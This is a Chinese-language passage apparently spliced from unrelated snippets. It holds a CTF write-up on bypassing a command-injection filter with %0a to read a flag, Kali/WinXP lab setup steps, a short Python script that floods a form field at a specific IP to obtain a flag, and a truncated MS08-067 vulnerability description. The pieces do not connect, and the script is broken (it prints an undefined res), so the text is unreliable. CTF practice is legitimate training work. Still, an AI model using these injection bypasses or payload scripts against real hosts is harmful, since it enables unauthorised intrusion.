打开环境与dvwa的命令注入有点像这里过滤了很多,尝试用%0a来突破能够正常执行命令以后,到根目录去寻找flag直接cat读取flag得到flagMS08067{0d07a0895471478280dd7effeb530ae7} 靶场 环境: 1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方 sudo su #切换到管理员权限下 sudo ifconfig #临时对ifconfig操作提权 2.将kali和 靶场 winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。 操作:选中. 这题跟i春秋一题一样直接贴出脚本得到flag from requests import post payload = {'greeting':'Merry Christmas'+'a' * 1000000} r = post('http://106.52.110.188:21028//index.php',data=payload) print(res.text) 得到flag MS08067 {5c5766918ed846e3a7e44948f0fed385. MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利